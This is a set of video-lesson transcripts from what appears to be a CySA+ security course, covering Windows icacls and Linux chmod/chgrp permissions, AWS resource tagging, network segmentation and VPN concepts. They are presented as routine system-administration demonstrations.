So here on that same machine, I'm on Drive D and I'm in the SampleFiles folder. And what we're really
looking at doing here is using the icacls command line tool.
[Video description begins] He opens a Command Prompt window. The D:\SampleFiles> prompt is displayed.
He executes the icacls command. The output displays detailed information and examples of icacls. The prompt
remains the same. [Video description ends]
The icacls command line tool lets you modify access control lists or ACLs for Windows file systems and so
one of the things that we're going to do here is start by running icacls . Now, the dot references the current
directory we can see here, that's D:\SampleFiles. When I press Enter, I'll see any entities or security principles
that have permissions here. First entry we see is the BUILTIN\Administrators group.
[Video description begins] He executes the cls command. The screen gets clear and the prompt remains the
same. Then he executes the icacls . command. The output displays a message which reads: Successfully
processed 1 files; Failed processing 0 files. The prompt remains the same. [Video description ends]
And the capital I here means inherited, permissions are inherited, in this case, from above from the root of
drive D. And it's full control, F for full control. We also see items like OI, which is object inherit, CI, container
inherit. So we can see users and groups that might have permissions at this level. For example, the BUILTIN\
Users group we see here has inherited the RX permission set in other words, that's read and execute. Now
another cool thing we can do here is run icacls and we can take all of this information and back it up. So let's
see how that would work. We could say, I want to take the current directory, so dot. So icacls .\*.*. I want to
get the permissions, not only for the folder itself, which is what we looked at, but for all the files within the
folder.
[Video description begins] He executes the icacls .\*.* command. The output displays a list of individual files
and their permission granted to a group or a user. The prompt remains the same. [Video description ends]
Actually, let's just do that and press Enter. You can see here it's giving us a listing for all the individual files
and the ACL or the permissions assigned for each individual file. So we can see whether it's users or groups
and the permissions have been assigned. So, having that knowledge, let's bring that back up, that previous
command, with your barrel key. Let's add to it. So what I want to do then is run /save, a front slash save. And I
want to store that on the root of drive D, let's say, and I want to call the file acls.txt. Okay, looks like it did
something.
[Video description begins] He executes the cls command and the screen gets clear. The prompt remains the
same. Then he executes the following command: icacls .\*.* /save d:\acls.txt. The output displays a list of
processed files. The prompt remains the same. [Video description ends]
Well, let's run notepad against it, notepad d:\acls.txt. Okay, cool, so it looks like it's got all the individual files
and all the permissions set. So the good thing about this is that we can restore those permissions at any point in
the future.
[Video description begins] He executes the notepad d:\acls.txt command. The acls.txt file opens in the Notepad
application. The prompt remains the same. He closes the acls.txt file. [Video description ends]
Now, normally backup software will have an option so you can have this as part of your backup and restore
procedures automatically. But it's still nice to know that we can do it at this level. And now I'm going to run an
icacls and . current directory and I'm going to use /inheritance and :d. I want to delete or remove the
inheritance.
[Video description begins] He clears the screen. The prompt remains the same. Then he executes the icacls .
/inheritance:d command. The output reads: processed file: . Successfully processed 1 files; Failed processing
0 files. The prompt remains the same. [Video description ends]
Now when I do that, if I look at the ACL for the current folder, we've lost for example, remember for the first
entry BUILTIN\Administrators used to be a capital I for inherited prior to full control. But now we've basically
we've copied over the ACL entries as explicit entries at this level instead of being inherited from above. Okay,
so let's pick on this entry here, the BUILTIN\Users group, which currently has read and execute.
[Video description begins] He executes the icacls . command. The output displays authorization information.
The prompt remains the same. He highlights BUILTIN\Administrators:(F) in the output. [Video description
ends]
I want the BUILTIN\Users group, some members of that group to also have the write permission W.
[Video description begins] He highlights BUILTIN\Users: (RX) in the output. [Video description ends]
So we can change that by running icacls a current directory assuming that's what we want to apply it to, so .
/grant. And users is the subject here that's the group, and :W. I want to grant write. Looks like it did, it
successfully processed one files it says.
[Video description begins] He executes the following command: icacls . /grant users:W. The output reads:
processed file: . Successfully processed 1 files; Failed processing 0 files. The prompt remains the same. [Video
description ends]
Okay, let's clear the screen and let's just run icacls . again. And indeed we can now see the W has been added
for the BUILTIN\Users group of course, we can remove them in that similar manner.
[Video description begins] He executes the icacls . command. The output displays authorization information.
The prompt remains the same. He highlights BUILTIN\Users: (RX,W) in the output. [Video description ends]
So icacls. What's going to be different here is we're going to use /remove instead of /grant like we did to grant
permissions and we'll specify users and we'll just clear the screen here and we'll just take a look at the icacls
command for the current directory.
[Video description begins] He executes the icacls . /remove users command. The output reads: processed file: .
Successfully processed 1 files; Failed processing 0 files. The prompt remains the same. [Video description
ends]
And users isn't even here anymore because we've actually completely removed the entry from the ACL. We
can also reset this back to its original form, so icacls . /reset.
[Video description begins] He executes the icacls . command. The output displays authorization information.
The prompt remains the same. [Video description ends]
And if we just take a look we're back to inherited permissions and there's Users again, with just the standard
inherited and read and execute.
[Video description begins] He executes the icacls . /reset command. The output displays the authorization
information. The prompt remains the same. Then he executes the icacls . command. The output displays
authorization information. The prompt remains the same. Then he highlights I and F in the following output
line: BUILTIN\Administrator: (I)(F). Then he highlights Users in the following output line: BUILTIN\Users:
(I)(RX). [Video description ends]
And if we actually wanted to restore that backup file of ACLs, we could do that too if we really wanted to.
icacls for the current directory /restore, that's the keyword. And then we give it the path and name of the file.
So it's called acls.txt. And then after that, we're good to go, we're back to what we might have been at when we
originally took the backup. So there's quite a bit you can do then using the icacls command to manage
Windows file system ACLs at the command line.
[Video description begins] He executes the following command: icacls . /restore d:\acls.txt. The output reads:
Not all privileges or groups referenced are assigned to the caller. Successfully processed 0 files; Failed
processing 0 files. The prompt remains the same. Then he executes the icacls . command. The output displays
authorization and inheritance information of administrator, system, and users. The prompt remains the
same. [Video description ends]
In this video, find out how to set permissions on a Linux EXT4 file system.
Objectives
[Video description begins] Topic title: Linux File System Permissions. The presenter is Dan Lachance. [Video
description ends]
There are many different ways to work with permissions in a UNIX and Linux environment.
[Video description begins] A command prompt widow labeled "dlachance@kali ~" is open. The root@kali:/#
prompt is displayed. [Video description ends]
Let's start here by creating a folder on the root of the file system. So I'll do that with mkdir. And I'm going to
call it /sharedfiles, slash meaning I want it on the root of the file system.
[Video description begins] He executes the mkdir /sharedfiles command. No output displays. The prompt
remains the same. [Video description ends]
Now, if I do an ls -ld, so long listing directory and I tell it I want to look at sharedfiles. Well, we are already in
the root by putting in slash in front of it. Then I can see the default permission set here.
[Video description begins] He executes the ls -ld /sharedfiles/ command. The output displays a message which
reads: drwxr-xr-x 2 root root 4096 Mar 5 12:59 /sharedfiles/. The prompt remains the same. [Video
description ends]
So I can see that there's a d at the beginning, it's a directory entry. Then I see the permissions here for the
owning user, which is seen here as root, so read, write, execute. Then the second set of permissions in this
case, which is only read and execute would be for the owning group, which happens to also be called root here.
And the last three permissions here, r and x, we'd execute again here for everybody else. So everybody other
than the owning user and the owning group.
[Video description begins] He highlights drwxr-xr-x 2 root root in the output. [Video description ends]
Now, we can change permissions here at a standard level with UNIX and Linux in terms of changing the
owning user or the owning group. So for example, I'm going to add a group here called hr, human resources.
[Video description begins] He executes the groupadd hr command. No output displays. The prompt remains
the same. [Video description ends]
And if I do a tail, let's say of the /etc/group file, we can see we've got an hr group, human resources.
[Video description begins] He executes the tail /etc/group command. The output displays a list of users and
admins to which group they belong. The prompt remains the same. He points to hr:x:1002: in the
output. [Video description ends]
Now, there's no one in it yet, but that's okay. We can do that if we really wanted to. I'm going to add a user
here, let's say useradd mbishop. And what I want to do is add that user to the group hr, so -g hr.
[Video description begins] He executes the useradd mbishop -g hr command. No output displays. The prompt
remains the same. [Video description ends]
Okay, so now, if I were just to tail, I'll use the upper-arrow key again. If I were to tail the /etc/group command,
nothing has changed with the hr group with an ID of 1002.
[Video description begins] He executes the tail /etc/group command. The output displays a list of users and
admins to which group they belong. The prompt remains the same. He highlights hr:x:1002: in the
output. [Video description ends]
However, if I were to tail /etc/passwd, we can see mbishop is in that group. There's the group ID, so that's the
affiliation or the association with that.
[Video description begins] He clears the screen. Then he executes the tail /etc/passwd command. The output
displays information about system's accounts which includes user ID, group ID, home directory, and shell.
The prompt remains the same. He highlights 1002 in the output. [Video description ends]
Now what I can do is I can run change group or chgrp. I want to change group to hr for /sharedfiles. What does
that mean? It means I want the owning group to be hr, it used to be root. Now in this case, we've got a typo. It's
sharedfiles in singular, or plural rather not singular. That's why we had a message about no such file or
directory. That's easily fixed, it's done.
[Video description begins] He executes the chgrp hr /sharedfiles command. No output displays. The prompt
remains the same. [Video description ends]
Let's take a look once again using ls -ld /sharedfiles. And again, just a little typo there, shared with a d, there
we are. So now hr is the owning group.
[Video description begins] He clears the screen. The prompt remains the same. Then he executes the ls -ld
/sharedfiles command. The output reads: drwxr-xr-x 2 root hr 4096 Mar 5 12:59 /sharedfiles. The prompt
remains the same. [Video description ends]
And what that means is members of the hr group like the user we added, mbishop, now will get the owning
group permissions, which in this case are simply read and execute. Now we can also change the permissions if
we really wanted to using the change mode command chmod. Now r or read has a numeric value of 4, right is
2, and execute is 1. So, if we want to give all the permissions, let's say for the hr group, read, write, and
execute, that would be 4 for read, that would be 2 for write or w, and then 1 for execute. So 4 plus 2 plus 1,
that's 7. So if I were to do this, chmod 77 and let's say 0. What does that mean? Well, let's put in the subject
here, which is /sharedfiles. This time, I'll make sure I spell it correctly, d and there's an s. The first 7 here
means that we want to have all permissions for the owning user. The second 7 means we want all the
permissions for the owning group. And the 0 would mean nothing for everyone else. Let's see what happens
here.
[Video description begins] He executes the chmod 770 /sharedfiles. No output displays. The prompt remains
the same. [Video description ends]
All right, let's bring up that previous command ls -ld of /sharedfiles. Notice indeed that the first 7, well, that
was already in place. But still it's still working. That's read, write, execute, 4 plus 2 plus 1, which is 7. And the
second 7 here gives us read, write, execute for the owning group, which we've changed now to hr. And then
the last 0 means everyone else. So nobody outside of the root user account or members of hr will have access
to the sharedfiles folder.
[Video description begins] He executes the ls -ld /sharedfiles command. The output reads: drwxrwx--- 2 root
hr 4096 Mar 5 12:59 /sharedfiles. The prompt remains the same. [Video description ends]
13. Video: Course Summary (it_cscysa20_09_enus_13)
Objectives
[Video description begins] Topic title: Course Summary. [Video description ends]
So in this course, we've examined on-premises and cloud-based user account configurations to maximize
authentication and authorization security. We did this by exploring the role of identity and access management,
otherwise called IAM. We looked at how to create IAM users, groups and roles, in Amazon Web Services. We
looked at how to configure user permission policies in AWS, how to deploy Simple Active Directory in AWS,
and also how to join a cloud virtual machine to a cloud-based directory service. Next, we looked at how multi-
factor authentication or MFA enhances sign-in security. We learned how to enable IAM user MFA, and we
talked about the role of identity federation across organizations. And finally, how to set permissions for both
Windows NTFS and Linux EXT4 file systems. In our next course, we'll move on to explore the management
of network infrastructure security, including cloud-based virtual network configurations, VPNs, and Virtual
Desktop Infrastructure or VDI.
Table of Contents
Objectives
[Video description begins] Topic title: Course Overview. Your host for this session is Dan Lachance, an IT
Trainer / Consultant. [Video description ends]
Hi, I'm Dan Lachance. I've worked in various IT roles since the early 1990s, including as a technical trainer, as
a programmer, a consultant, as well as an IT tech author and editor. I've held and still hold IT certifications
related to Linux, Novell, Lotus CompTia and Microsoft. Some of my specialties over the years have included
networking, IT security, cloud solutions, Linux management, and configuration, and troubleshooting across a
wide array of Microsoft products. The CS0-002 CompTia Cybersecurity Analyst or CySa+ certification exam
is designed for IT professionals looking to gain security analyst skills to perform data analysis, to identify
vulnerabilities, threats and risks to an organization. To configure and use threat detection tools and secure and
protect an organization's applications and systems. In this course, we're going to explore securing network
infrastructure including cloud based virtual network configurations, resource tagging, VPNs, and virtual
desktop infrastructure or VDI.
I'll start by comparing the management of network security both on-premises and in the cloud. And we'll
examine tools for identifying and classifying sensitive systems and data. I'll then demonstrate cloud resource
tagging, explore security enhancement through network segmentation, and select a VPN solution based on
business needs. Next, I'll demonstrate how to link an on-premises network to the AWS cloud through a site-to-
site VPN. I will explore the design of a cloud networking strategy, and deploy a virtual private cloud or VPC
in AWS. I'll continue with an examination of change management procedures and the benefits of VDI. I'll then
show how to configure and connect to a cloud VDI and examine the different types of firewalls for protecting
digital assets. Lastly, I'll demonstrate how to configure a Windows based firewall in AWS Network Security
Group, NSG. And then will explore network access control radius and Tacacs+ and we'll define the roles that
they play in securing a network environment and controlling network access.
During this video, you will learn how to identify similarities and differences when managing network security
on-premises and in the cloud.
Objectives
identify similarities and differences when managing network security on-premises and in the cloud
[Video description begins] Topic title: On-premises and Cloud Management. The presenter is Dan
Lachance. [Video description ends]
There are a lot of parallels that can be drawn between on-premises IT environments and cloud-based IT
environments including at the security level.
[Video description begins] On-premises and Cloud IT Management. [Video description ends]
At the network level or infrastructure level, we have to deal with things like subnets and IP addressing used for
those subnets, DNS name resolution, VPN encrypted tunnels, such as linking an on-premises network into the
cloud or linking offices together, even without using cloud computing. There's encryption of data at rest and
data transmissions over the network. There's general hardening procedures, things like removing unnecessary
services, changing default usernames or passwords, and also continuous monitoring to ensure the efficacy of
security controls. That is the same in principle, whether you deal with an on-premises environment or the
cloud.
At the storage infrastructure level, other things we would normally consider on-premises would include
different levels of RAID. So arranging groups of disks together to maximize performance and data availability.
Also determining the IOPS, that is the input and output operations per second, which is a measure of
throughput within a dusk subsystem. Also data retention periods, data availability, that relates back to RAID,
whether we encrypt data at rest, hardening our storage environment, and monitoring performance metrics, and
even auditing access to sensitive files. Now a lot of that applies in the cloud as it does to on-premises.
One of the variations certainly would be RAID levels. In a cloud computing environment, as a cloud tenant or
cloud customer, you're using IT services running on somebody else's hardware. So hardware rate configuration
would not be something that would apply to a cloud customer in that scenario. Then there's the compute part of
the infrastructure, physical hosts, virtual machines running on hosts, and the amount of CPUs and RAM
available physically in terms of hardware resources, remote management to operating systems, as well as to
physical hosts at the hardware level, and the hardening and monitoring of that compute environment.
Now even in the cloud, there are some ways that you can have dedicated physical hosts that run virtual
machines only that your organization deploys. So it doesn't house any virtual machines run by other cloud
customers. This is possible, but of course, you pay a premium for this type of the solution.
[Video description begins] Data Center Equipment Racks. [Video description ends]
The other thing to think about is data center equipment racks. So whether you're doing this in your own data
center or server room, or at the cloud provider level. They need to make sure that the data center whose server
rooms are locked down, and that equipment racks are locked. So that if someone happened to get into that
environment, they wouldn't be able, for example, to steal disks from a storage array because it would be behind
a locked door in an equipment rack. So, when we do this on-premises, it's a capital investment because the
organization has to invest in acquiring this equipment. Then of course, there's the physical security aspect
we've mentioned, such as locking up equipment racks.
Then the physical architecture kicks in. Now certainly, this is a big deal on-premises and in the cloud for the
cloud service provider, it's a big concern. We have to think about physical property and facility security.
Heating, ventilation, and air condition to keep equipment running smoothly. Power generators that might kick
in, in the event of a power grid disruption. Replication of data to alternate regions, in the event of a disaster in
the primary region. And even Internet connection redundancy, having more than one link to the Internet. For
example, if we've got an on-premises data center that we're linking to a public cloud provider, we want to
make sure if that is used for mission critical apps that we've got more than one network link going to the cloud,
ideally from multiple vendors. MVPC can be used even at the storage network level, to have redundant paths
to storage appliances through equipment from different vendors.
[Video description begins] Multi vendor pathway connectivity is abbreviated as MVPC. [Video description
ends]
But it also can apply to having different Internet links from different Internet service providers. So the design
of a cloud environment is going to be crucial then in ensuring an organization success in using the cloud, such
as with tenant partitioning.
That means, keeping cloud customers separate from one another. In terms of the services they use, the
configuration of those services, and certainly the data stored in the cloud. It also means, applying the
appropriate access control mechanisms. That could apply, for example, at the user account level used to sign
into manage cloud resources and the permissions granted for allowing limited management of cloud items.
Such as only, allowing the management of cloud storage as opposed to allowing the management of cloud-
based virtual machines.
[Video description begins] Tenant Partitioning. [Video description ends]
The other thing to think about is with tenant partitioning, having multiple identity services. So for identity and
access management, one cloud customer, for example, might deploy an instance of active directory in the
cloud. Whereas, another customer might do the same thing but they are kept completely separate from one
another. Tenant partitioning would apply of course for all cloud services. Whether it's infrastructure as a
service, platform as a service, or software as a service. So we've got secure isolation of resources, including
data amongst cloud tenants, and separate user directories for users and groups.
Again, that goes back to our example of multiple active directory instances that are kept separate for different
cloud customers. Separate cloud service resources and configurations is also an important part of this. So
because of tenant partitioning, cloud providers can support multiple customers simultaneously while assuring
those customers that they have their own isolated computing environment.
Find out how to use the appropriate tools to identify and classify sensitive systems and data.
Objectives
use the appropriate tools to identify and classify sensitive systems and data
[Video description begins] Topic title: Asset Discovery and Management. The presenter is Dan
Lachance. [Video description ends]
From an IT security perspective, you can't effectively protect something if you don't know you have it.
And so it's important then to be able to discover assets that are crucial to the organization so that the
appropriate security controls can be put in place and periodically reviewed to ensure the protection of those
assets. So one of the things to consider is data retention policies. How long data should be retained? But in
order for that to be effective, we have to be able to classify data first because certain types of data such as
financial data, due to regulations might need to be retained for longer than things like employee onboarding
documentation.
We also have to think about metadata accuracy that might have been applied to data assets, whether it's cloud
based resources or files on a file server. Metadata is extra descriptive information, such as flagging a Microsoft
Excel spreadsheet as being personally identifiable information or PII. So data can be classified using a number
of different tools, it can look at that metadata and treat that data accordingly. So we have to have the
supporting infrastructure including the software that can be used to discover inventory and data that's classified
differently gets treated differently.
Data classification means identifying data types. And the locations of those data types. And the appropriate
security clearances that users would require to access that data. We also have to determine any existing
security controls that might already put in place to support the protection of that data. Let's say we're talking,
for example, about credit card holder data. And that might be spread out across multiple retail locations. And
we might require employees to have a specific security clearance. So maybe they sign in using specific
mechanisms, like multi-factor authentication before even gaining access to credit card holder information. An
existing controls would be really defined by the rules in the PCI DSS security standard which applies to credit
card holder information held by vendors or merchants, retailers.
Data classification applies also internally. So we might classify onboarding data differently than we would
budgets or organizational charts which would be more sensitive in nature. So they should be protected
differently and perhaps backed up and stored for different period of time than onboarding data. Then
depending on the nature of your industry, you might have very sensitive data, like medical patient information,
financial information. PHI is protected health information and PII is personally identifiable information,
essentially anything that can be traced back to an individual user. Whether its health related or not, and in some
cases depending on laws or regulations you might not be allowed to store data in the cloud. Might have to be
stored on-premises.
Then there's data that might be classified as being public, like marketing brochures or product and service
documentation. So by flagging different types of data, such as files on file servers in these different ways, it
allows us to more easily secure data appropriately. Again, naturally, spending more time on security controls to
secure sensitive data makes sense compared to publicly available data. The next thing to consider is that the
security controls that are put in place to protect different types of data will vary depending on how that data is
classified. For example, anything top secret would have more security controls in place or more strict security
controls in place than would otherwise be there.
So we might have controls related to Multi-Factor Authentication, MFA, or encryption of varying types using
different cyphers and different key lines. We might enable full auditing on sensitive information on a server
where we might not audit anything at all for product brochures. Malware scanning might differ for different
classifications of data. We might apply data loss prevention only for company or trade secrets. Or we might
enable data synchronization and replication to increase data availability in case of an outage. We might also
have policies in place for how data gets sanitized. For example, sensitive financial information might be
required to be retained for seven years as an example. But then after that time, it needs to be disposed of in a
secured manner compared to product brochures which might not need any specific type of data deletion
technique to be employed.
[Video description begins] Data Discovery Challenges - Location. [Video description ends]
The other thing these days with cloud computing is to think about the locations. If you've replicated data in
different regions around the world, you need to be aware of that that's been done. So that when data is removed
in one site, you can assure it's been removed and others in accordance with data sanitization policies. So
replication is something to think about. The other is content delivery networks or CDN. A CDN replicates web
app content, different locations, so that when users in those locations requests that content, it's served up
locally. So it reduces network latency. We have to bear this in mind when we are inventorying, data assets that
need to be classified.
In this video, you will learn how to add metadata to cloud resources for organizational and billing purposes.
Objectives
[Video description begins] Topic title: Cloud Resource Tagging. The presenter is Dan Lachance . [Video
description ends]
In a cloud computing environment, you have the option of tagging cloud resources. Cloud resources would
include things like virtual machines deployed into the cloud, cloud storage configurations, databases deployed
into the cloud, user accounts created in the cloud, that type of thing. Now tagging means you're adding extra
information or metadata to those resources, maybe to assign it to a department, a region, a cost center, project
manager, any of those things.
[Video description begins] A web page called "AWS Management Console" opens. The page is divided into
three sections labelled "AWS services", "Access resources on the go", and "Explore AWS ". The AWS services
section contains a search bar labelled “Find Services”. [Video description ends]
So here in AWS, Amazon Web Services, I've signed in to my account. Here in the console, I'm going to go
under All services, Compute, EC2.
[Video description begins] A web page called "EC2 Management Console" opens. It is divided into two parts.
The first part is a navigation pane. The second part is a content pane. [Video description ends]
EC2 stands for Elastic Cloud Compute, and it's all about virtual machines and the resources related to them
running in the AWS cloud. So for example if I go to the Instances view I'll see an EC2 instances or virtual
machine that were deployed.
[Video description begins] He clicks an option called "Instances" in the navigation pane and the
corresponding page opens in the content pane. It includes a table with six columns and four rows. The column
headers include Name, Instance ID, Instance Type, Availability Zone, Instance State, and Status
Checks. [Video description ends]
Although notice that under Instance State they're all stopped, they're not running. But that doesn't matter when
it comes to resource tagging.
[Video description begins] He selects WinSrv2019-2 under the Name column header. A new section opens
under the table. It contains tabs called "Description", "Status Checks", "Monitoring", and "Tags". [Video
description ends]
So for example if I select a specific EC2 instance up here in the list, down below I can go down under the Tags
tab.
[Video description begins] He clicks the Tags tab. [Video description ends]
Here the only key and value pair I have is the Name tag, which is a Value of WinSrv2019-2 and that's what's
showing up here in the view.
But in AWS and the rules will vary from one cloud provider to another but in AWS, you can have up to 50
tags for a single resource. So this is only one we can have 49 more. So I'm going to click Add/Edit Tags.
[Video description begins] He clicks a button called "Add/Edit Tags" in the Tags tab. A dialog box called
"Add/Edit Tags" opens. [Video description ends]
[Video description begins] He clicks a button called "Create Tag". [Video description ends]
[Video description begins] He enters text "Region" under the Key column header and "Eastern" under the
Value column header. [Video description ends]
So I'm going to put in Eastern, and I'll Save it and then that tag shows up.
[Video description begins] He clicks a button called "Save" and the dialog box closes. [Video description
ends]
[Video description begins] He clicks the Add/Edit Tags button. The Add/Edit Tags dialog box opens. [Video
description ends]
[Video description begins] He clicks the Create Tag button. He enters text "Project" under the Key column
header and "XYZ" under the Value column header. [Video description ends]
Now notice it's popping up with these items already because if the name of a tag was already used, it'll show
up in the list. See this here as I type in Pr Project shows up. It's already been used. If I type in X, well for that
particular tag, the value XYZ has already been used. And that might be okay. It's convenient. It's like an
autofill. So I'm going to go ahead and tie that tag to it. Now we can also tag resources using command line
tools and programmatically, but here we're just using the GUI. I'm going to go ahead and Save that.
[Video description begins] He clicks the Save button and the dialog box closes. [Video description ends]
[Video description begins] He points to the WinSrv2019-2 instance in the table. [Video description ends]
Now why would you do this? One of the reasons is it just helps you organize and manage and search for items
by tags and their values. For example, if I click on the Tags view over on the left, I can see all of the tags here
and values that were used.
[Video description begins] He clicks an option called "Tags" in the navigation pane and the corresponding
page opens in the content pane. It includes a table. The table includes seven columns and several rows. The
column headers include Tag Key, Tag Value, Total, Volumes, and Snapshots. [Video description ends]
And I can see the total number of Instances of those tags. For example, Project XYZ, there are two instances of
that being used. And if I click on the link here for that, then I'll get a sense of where it's actually being used.
[Video description begins] The corresponding page opens. It includes a table with three columns and several
rows. The column headers are Resource ID, Project, and Name. [Video description ends]
So I can see here from the list, it's on my two WinSrv2019 virtual machines. I can see that the Project tag here,
can see the Project column at the top, has XYZ as a value.
[Video description begins] He clicks the Tags options in the navigation pane and the corresponding page
opens in the content pane. [Video description ends]
Now you can also of course, search for specific keys and/or values. So if I'm interested, for example, in
project, well I can type in project and press Enter.
[Video description begins] He enters project in a search box called "Search Keys" and corresponding details
are displayed in the table. [Video description ends]
And I can see that for the project Tag Key, the only value that's been used here is XYZ. Now let's change that
just for fun. I'm going to go back to Instances, let's say I pick on a Linux instance and down below under Tags,
I'll click Add/Edit and then create, Project let's say ABC.
[Video description begins] He clicks the Add/Edit Tags button. The Add/Edit Tags dialog box opens. He then
clicks the Create Tag button. [Video description ends]
[Video description begins] He enters text "Project" under the Key column header and "ABC" under the Value
column header. He clicks the Save button and the dialog box closes. [Video description ends]
So there's project ABC. So now if we go back to Tags and if we tell it weren't interested in the Project, Tag
Key and you might have to click the Refresh button since we just did it but you will see now there are two
variations at least of the Tag Value for that same Tag Key of Project.
5. Video: Network Segmentation (it_cscysa20_10_enus_05)
Upon completion of this video, you will be able to recognize methods for enhancing security with network
segmentation.
Objectives
[Video description begins] Topic title: Network Segmentation. The presenter is Dan Lachance. [Video
description ends]
How your network is laid out and broken up and how devices are placed on those networks can have a big
impact on the security of your network environment. So it's important to think that we might have multiple
network segments for different purposes such as a management network. For example, in a data center, servers
might have a second network interface connected to a separate network switch, which is used solely by
administrators for management purposes. We can also create different network segments or subnets, or
VLANs, depending on your environment for app isolation purposes.
For example, if we've got a mission critical app, we might want it to be on its own network segment with a
limited access on a required basis only to that network. We can also use network segmentation for device
isolation. This is used often to secure devices by simply placing them on their own isolated network. So that if
they're compromised, they doesn't automatically mean everything else on that network is compromised,
because there's nothing else on the network. And so this is a great way to deal with IoT devices that might not
be as secure as needed by your organization's security policies. Then there's air gapping. Air gapping means
physically not having a network connection to another network.
For example, if we've got a manufacturing environment with industrial robotic equipment manufacturing nuts
and bolts, we might not want that to be reachable from the Internet unless there's a very good reason. And so
we might make sure it's not physically wired into any network that would allow access from the Internet, and
also make sure that there's no wireless connectivity on that secured network. That is air gapping. And
sometimes that is required to secure a network. The downfall, of course, is remote management capabilities
would be very limited. And if you must have remote management capabilities, then using secured solutions
over the network like VPNs might be in order.
[Video description begins] Virtual Local Area Network (VLAN). [Video description ends]
A virtual local area network or VLAN is applicable to a network switch, by default, all ports in a switch. So if
you've got a 24-port Ethernet switch, by default, all of those 24 ports are in one default VLAN. So they're not
segregated from one another. However, you can configure multiple VLANs within a switch or even a cross
switch trunks. And those VLAN memberships can be determined by the physical ports that devices are
plugged into, or software-based such as based on what their IP address is, regardless of the port that plugged
into that can determine the VLAN membership. We can also use this for isolating IoT devices.
In the cloud network environment, we normally don't have direct access to the underlying network
infrastructure hardware like routers and switches. Instead, we use software defined networking or SDN to
make our network configurations using command line tools or a GUI which in turn modifies the network
configuration of underlying devices at the cloud provider network. So we can build multiple VPCs. You might
wonder, what's a VPC? A VPC is a virtual private cloud. In other words, it's a virtual network. Just like on-
premises, in the cloud, you would have to plan out how many VPCs are required and how they will be used.
Then you think about the subnets that you might define within a VPC.
For example, you might have a VPC in a particular geographical region in the cloud, such as central Canada.
And then you might break that up into a couple of subnets, one that will be used for production purposes and
another that might be used for testing sandbox purposes. You might consider deploying cloud virtual machines
or VM instances with only private IP addresses. If you assign a public IP address to every virtual machine
deployed in the cloud, then potentially, it is reachable from the Internet. That is probably not the best way to
deploy those virtual machines from a security perspective, because the potential is they're reachable from the
Internet. They might say, well, I need to manage those virtual machines from on-premises essentially from the
Internet.
Well, you can lock that down with firewall rules to limit from where remote management is allowed. And you
might require a VPN connection prior to allowing access to the private IPs of the VPNs, or even VPN access to
a jump box that is publicly visible from the Internet through which you would then gain access to the private
network, where the VMs that only have a private IP address would be reachable. You can also configure
routing table entries in the cloud to limit network access. You can also use the benefits of a cloud access
security broker or a CASB. A CASB is used where security policies are defined to control access to cloud
resources and also to audit cloud resource activity.
Remote host management remains an important aspect of designing security when it comes to deploying
virtual machines in the cloud. Secure Shell is used to manage many different network devices as well as Linux
and UNIX hosts. And Remote Desktop Protocol, RDP, is used to manage Windows hosts. Now SSH uses port
22 for remote management of UNIX and Linux and network devices as we've mentioned. RDP uses port 3389
for remote management of Windows hosts. Now, having a public IP address assigned to a virtual machine in
the cloud or any server that is publicly visible is not a great idea. There are known vulnerabilities with certain
versions of RDP, for example, you don't want that exposed directly to the Internet.
Instead, as we've mentioned, you might want to have a VPN connection that must be authenticated to prior to
allowing access to the private IP of Linux and Windows hosts. Or you might use a jump box that has a public
IP address that's reachable, ideally only through a VPN connection. And after successful authentication, access
would be allowed to the cloud-based virtual machines that would only have private IP addresses.
[Video description begins] Topic title: VPNs. The presenter is Dan Lachance. [Video description ends]
Connecting over the Internet to a remote location that might contain sensitive information, sensitive servers,
needs to be secured.
[Video description begins] Virtual Private Network (VPN). [Video description ends]
And often that's done through a virtual private network or VPN. A VPN is an encrypted point-to-point network
tunnel. What does that mean? It means from a device that's trying to make a connection to a remote location,
it's talking to that remote location at the network perimeter. And after a successful authentication and
negotiation of security standards, such as protocols that will be used. Then an encrypted tunnel is established
between those two endpoints.
Anything transmitted between those two endpoints over the Internet is secured, it's encrypted. It can't be
captured, well, it can be captured, it's just that it can't be made sense off because it's encrypted. So it allows
secure connectivity over an untrusted network such as the Internet. Now in order to use a VPN at the network
level, you need a VPN appliance. A VPN appliance can be hardware or software. But it's going to need to have
a public IP address that is reachable from the Internet. And you configure either a pre-shared key, PSK. This is
a symmetric key that's used on both ends of the connection to establish the tunnel, it's a secret. Or you might
use something like a PKI certificate to authenticate two devices together to establish the VPN tunnel.
Common VPN protocols include point-to-point tunneling protocol or PPTP. PPTP is known to have some
security vulnerabilities, you should try to stay away from it as much as possible. Layer 2 tunneling protocol
with IPsec and HTTPS based VPNs. Otherwise called SSL VPNs, but technically SSL is a deprecated security
protocol, so you're better off calling it an HTTPS VPN. The benefit of an HTTPS type of VPN is that it's
firewall friendly. It normally uses Port 443, which is allowed at least in an outbound direction on most
networks. A site-to-site VPN, like the name implies, links two sites together.
Whether it's two branch offices, that are each connected to the Internet. You might want an encrypted tunnel to
securely exchange and transmit data between those locations. But as pictured in our diagram, you can also
have an encrypted VPN tunnel with your on-premises network, pictured on the left. Connecting into the cloud,
pictured on the right, having a site-to-site link between those locations. Again, after the tunnel is established,
anything sent between those two locations is completely protected, it's encrypted.
Now the Site A listed on the left would have the VPN appliance, hardware or software with the public IP
address. And site B in this case, the cloud, will also have a VPN appliance configured with a public IP address.
Then after the tunnel is established we're good to go. Now, in this particular example all of the client devices
say on your on-premises network. Do not need to have individual VPN client configurations to access
resources in the cloud through the VPN tunnel. All they have to do is route their traffic through a router that
knows how to send traffic through the VPN tunnel to IP address ranges on the other side of the tunnel in the
cloud.
Client-to-Site VPNs are widely popular as well, this is used when you've got users that might be traveling for
work. And while they're away at a customer site or at a hotel at night working. They have a secured tunnel to
corporate resources over the Internet, it's an encrypted connection. So this is done by making sure that we have
a VPN client configured on the device, whether it's a smartphone or a laptop. And configure it accordingly
with the required credentials.
Whether the user must enter a username and password, enter a code from a key fob. Or maybe the device
requires a PKI certificate to complete the authentication to the VPN. Now of course in this case, if the site is a
cloud environment or whether it's just an office environment. Either way you need a VPN appliance that is
reachable by the VPN client. The configuration of the VPN of course determines whether it uses Layer 2
tunneling protocol with IPsec or whether it's an HTTPS based VPN. Whether it requires certificates or just a
pre-shared key, and so on.
[Video description begins] Configuring a Cloud Site-to-Site VPN. [Video description ends]
So one of the high-level step then in configuring a cloud site-to-site VPN, meaning the target, is a cloud
environment, a public cloud provider. The first thing you'd have to do in the cloud is you have to make a
representation of the customer on-premises VPN appliance. So often that's called a customer gateway, you're
configuring this in the cloud environment. Next, you would create a cloud representation of a VPN appliance.
